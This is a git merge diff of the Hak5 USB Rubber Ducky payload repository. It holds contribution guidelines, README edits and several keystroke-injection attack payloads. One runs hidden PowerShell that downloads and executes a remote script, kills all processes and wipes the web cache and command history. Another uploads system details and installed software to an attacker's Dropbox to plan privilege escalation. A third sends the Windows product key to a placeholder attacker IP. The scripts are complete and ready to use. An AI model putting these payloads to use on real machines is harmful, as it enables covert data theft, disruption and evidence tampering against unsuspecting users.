Merge branch 'hak5:master' into master
commit
7cfcac7c36
|
@ -0,0 +1,87 @@
|
|||
### Exported from README.md
|
||||
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using DEFINE in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a DEFINE with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use `DEFINE` where possible. Best practice is to use labels that start with # for easy identification throughout your payload.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using comments at the top of your payload or "inline" where applicable
|
||||
<pre>
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
REM CONFIGURATION
|
||||
REM REQUIRED - Provide URL used for Example
|
||||
DEFINE #MY_TARGET_URL example.com
|
||||
|
||||
REM OPTIONAL - How long until payload starts; default 5s
|
||||
DEFINE #BOOT_DELAY 5000
|
||||
|
||||
DELAY #BOOT_DELAY
|
||||
...
|
||||
STRING #MY_TARGET_URL
|
||||
...
|
||||
</pre>
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `REM` comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
<pre>
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
REM Title: Example Payload
|
||||
REM Author: Korben Dallas
|
||||
REM Description: Opens hidden powershell and
|
||||
REM Target: Windows 10
|
||||
REM Props: Hak5, Darren Kitchen, Korben
|
||||
REM Version: 1.0
|
||||
REM Category: General
|
||||
</pre>
|
31
README.md
31
README.md
|
@ -31,18 +31,19 @@ This repository contains payloads, extensions and languages for the Hak5 USB Rub
|
|||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
# Table of contents
|
||||
<details>
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#shop">Links</a></li>
|
||||
<li><a href="#about-the-new-usb-rubber-ducky">About the USB Rubber Ducky</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><a href="#about-duckyscript">About DuckyScript™</a></li>
|
||||
<li><a href="#contributing">Contributing Payloads</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
@ -86,9 +87,11 @@ A "flash drive" that types keystroke injection payloads into unsuspecting device
|
|||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
[![USB Rubber Ducky](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MiIkRK_o3RBhZzUkrzr%2Fuploads%2FW1Cy0NoSZJhOkaG7gk9t%2Fusb-rubber-ducky-3d-white-bg.png?alt=media&token=7a92ff75-c7ae-4280-b4da-690bef71dac8 "USB Rubber Ducky")](https://hak5.org/products/usb-rubber-ducky)
|
||||
|
||||
<p align="center"><i> New USB Rubber Ducky (A+C, DuckyScript 3.0, 2022)</i></p>
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=meNlOrdQJFo"><img src="https://3076592524-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MiIkRK_o3RBhZzUkrzr%2Fuploads%2FCiHTAeL8jlCA3mG7ltCF%2FScreencast%20from%2003-03-2023%2001_08_58%20PM.gif?alt=media"/></a>
|
||||
<br/>
|
||||
<i>New USB Rubber Ducky (A+C, DuckyScript 3.0, 2022)</i>
|
||||
</p>
|
||||
|
||||
Computers trust humans. Humans use keyboards. Hence the universal spec — HID, or Human Interface Device.
|
||||
|
||||
|
@ -98,6 +101,8 @@ The USB Rubber Ducky — which looks like an innocent flash drive to humans —
|
|||
|
||||
Easily automate any task you can perform with a keyboard with an easy to learn language designed specifically for the USB Rubber Ducky.
|
||||
|
||||
|
||||
|
||||
# About DuckyScript™
|
||||
|
||||
## Legacy DuckyScript (1.0)
|
||||
|
@ -123,12 +128,24 @@ _Compiled DuckyScript means that there is both `source code` and an `inject.bin`
|
|||
|
||||
The files in this repository are _the source code_ in the form of `payload.txt` files.
|
||||
|
||||
<h1><a href="https://shop.hak5.org/collections/usb-rubber-ducky-accessories/products/advanced-duckyscript-course">Learn DuckyScript directly from the creators</a></h1>
|
||||
<p align="center">
|
||||
<a href="https://shop.hak5.org/collections/usb-rubber-ducky-accessories/products/advanced-duckyscript-course"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/online-course-icon_2000x.png"/></a>
|
||||
|
||||
<p>
|
||||
Learn Advanced DuckyScript directly from the creators and unlock creative potential for the USB Rubber Ducky. Covering all aspects of advanced DuckyScript and Keystroke Injection attacks, these practical lessons build on one another from the basics on up.
|
||||
|
||||
This online course includes 7 hours of video instruction covering 54 lessons, 40+ exercises to reinforce your knowledge, quizzes throughout as well as 8 projects to test your skills.
|
||||
</p>
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_180x.png?v=1659135374"></a>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
# Close All Applications - BADUSB ✅
|
||||
|
||||
A script used to close all target open applications.
|
||||
|
||||
🟢 **Plug-And-Play** 🟢
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script used to close all target open applications.
|
||||
|
||||
Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- No settings - Plug-And-Play
|
|
@ -0,0 +1,18 @@
|
|||
# Download Python script
|
||||
|
||||
# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
|
||||
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
|
||||
$savePath = "$env:temp\script.py"
|
||||
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
|
||||
|
||||
# Execute Python script
|
||||
& python $savePath
|
||||
|
||||
# Delete the downloaded script
|
||||
Remove-Item $savePath
|
||||
|
||||
# Clear the download history from the system's web cache
|
||||
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
|
|
@ -0,0 +1,44 @@
|
|||
REM #####################################################
|
||||
REM # |
|
||||
REM # Title : Close All Applications |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM #####################################################
|
||||
|
||||
REM Plug-And-Play
|
||||
|
||||
REM
|
||||
REM 1. Open a powershell
|
||||
REM 2. Download a Python script
|
||||
REM 3. Execute it
|
||||
REM 4. Remove Python script downloaded
|
||||
REM 5. Delete powershell history
|
||||
REM
|
||||
|
||||
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
|
||||
DEFINE POWERSHEL_CODE example.com
|
||||
|
||||
DELAY 2000
|
||||
GUI x
|
||||
DELAY 250
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
DOWNARROW
|
||||
ENTER
|
||||
DELAY 1000
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING irm POWERSHEL_CODE | iex
|
||||
ENTER
|
|
@ -0,0 +1,12 @@
|
|||
try:
|
||||
import psutil
|
||||
except:
|
||||
import os
|
||||
os.system("pip install psutil")
|
||||
import psutil
|
||||
|
||||
for process in psutil.process_iter():
|
||||
try:
|
||||
process.terminate()
|
||||
except:
|
||||
pass
|
|
@ -0,0 +1,6 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
|
|
@ -0,0 +1,53 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
## Description
|
||||
|
||||
This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
|
||||
|
||||
## Usage
|
||||
|
||||
### Setup
|
||||
|
||||
- **Configure your Dropbox application**
|
||||
|
||||
- Create a Dropbox account.
|
||||
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
|
||||
- Go to the settings of this app and write down your "App key" and "App secret".
|
||||
*These are your "<APP_KEY>" and "<APP_SECRET>".*
|
||||
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
|
||||
- After that, open this link in your browser *(values between brackets must be changed)*.
|
||||
```
|
||||
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
|
||||
```
|
||||
- Connect your application, allow its permissions, and note the code it gives you.
|
||||
*This is your "<APP_CODE>".*
|
||||
- Open a command prompt and run this command *(values between brackets must be changed)*.
|
||||
```
|
||||
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
|
||||
```
|
||||
- Note the "refresh_token" value of the result.
|
||||
*This is your "<REFRESH_TOKEN>".*
|
||||
|
||||
- **Prepare your payload**
|
||||
|
||||
- Download the Powershell script ".ps1".
|
||||
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
|
||||
- Upload your modified ".ps1" file to Dropbox and copy the upload link.
|
||||
- Replace the end of the link from "?dl=0" to "?dl=1"
|
||||
*This is your "<DOWNLOAD_LINK>".*
|
||||
- Download the "payload.txt" file.
|
||||
- Edit it to include your <DOWNLOAD_LINK>.
|
||||
|
||||
### Analysis
|
||||
|
||||
Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system.
|
||||
|
||||
The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
|
@ -0,0 +1,17 @@
|
|||
REM Title: Windows Privilege Excalibur
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrates Windows system information and installed programs from the target computer to DropBox cloud storage for subsequent privilege escalation analysis.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace DOWNLOAD_LINK with the actual download link of the script.
|
||||
DEFINE DOWNLOAD_LINK example.com
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
|
||||
STRING DOWNLOAD_LINK
|
||||
STRING ; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -0,0 +1,43 @@
|
|||
#Replace <APP_KEY> with the actual "App Key" of your app.
|
||||
#Replace <APP_SECRET> with the actual "App Secret" of your app.
|
||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||
|
||||
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#Define the headers required for the access token request
|
||||
|
||||
$headers = @{
|
||||
"Content-Type" = "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
#Define the parameters for the access token request
|
||||
|
||||
$body = @{
|
||||
grant_type = "refresh_token"
|
||||
refresh_token = "<REFRESH_TOKEN>"
|
||||
client_id = "<APP_KEY>"
|
||||
client_secret = "<APP_SECRET>"
|
||||
}
|
||||
|
||||
#Request an access token from Dropbox using the body and headers defined above
|
||||
|
||||
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
|
||||
$access_token = $access_token_response.access_token
|
||||
|
||||
#Define headers for the file upload
|
||||
|
||||
$headers = @{
|
||||
"Authorization" = "Bearer $access_token"
|
||||
"Content-Type" = "application/octet-stream"
|
||||
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
|
||||
}
|
||||
|
||||
#Define the report for the file upload
|
||||
|
||||
$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||
|
||||
#Upload the report to Dropbox using the headers and body defined above
|
||||
|
||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null
|
|
@ -1,4 +1,4 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
<h1 align="center">
|
||||
<a href="https://git.io/typing-svg">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑¢er=true&size=25">
|
||||
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
|
||||
</a>
|
||||
</h1>
|
||||
|
||||
|
@ -8,34 +8,27 @@
|
|||
|
||||
This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
|
||||
|
||||
## Demo
|
||||
|
||||
<h2 align="center">
|
||||
<img src="https://raw.githubusercontent.com/Who-Is-Julien/Ducky-Scripts/main/Windows-Product-Duckey/demo.gif">
|
||||
</h2>
|
||||
|
||||
Here we can see that the attacker's server received the following request:
|
||||
```
|
||||
GET /?duckey=A1B2C-3D4E5-F6G6F-5E4D3-C2B1A HTTP/1.1
|
||||
```
|
||||
*Which contains the target's Windows product key!*
|
||||
|
||||
## Usage
|
||||
|
||||
To use this script, follow these steps:
|
||||
### Setup
|
||||
|
||||
1. Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
|
||||
```
|
||||
python -m http.server 80
|
||||
```
|
||||
2. Download the payload.txt and .ps1 files and modify them to include the IP address of your server.
|
||||
3. Move the modified .ps1 file to the root directory of your website, so it is downloadable from this address:
|
||||
- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server.
|
||||
- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||
```
|
||||
http://REMOTE_IP_ADDRESS/.ps1
|
||||
http://<REMOTE_IP_ADDRESS>/.ps1
|
||||
```
|
||||
4. Plug in your device that is configured with the modified payload.txt to the target's computer.
|
||||
5. Wait for the target to download and execute the .ps1 file from your website. You can track the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
### Analysis
|
||||
|
||||
Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
|
||||
|
||||
|
||||
***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
|
||||
|
||||
---
|
||||
|
||||
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*
|
||||
|
|
|
@ -1,14 +0,0 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
|
|
@ -1,10 +1,8 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#clear windows run dialog history
|
||||
#Clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
||||
Exit
|
||||
#Retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
|
Loading…
Reference in New Issue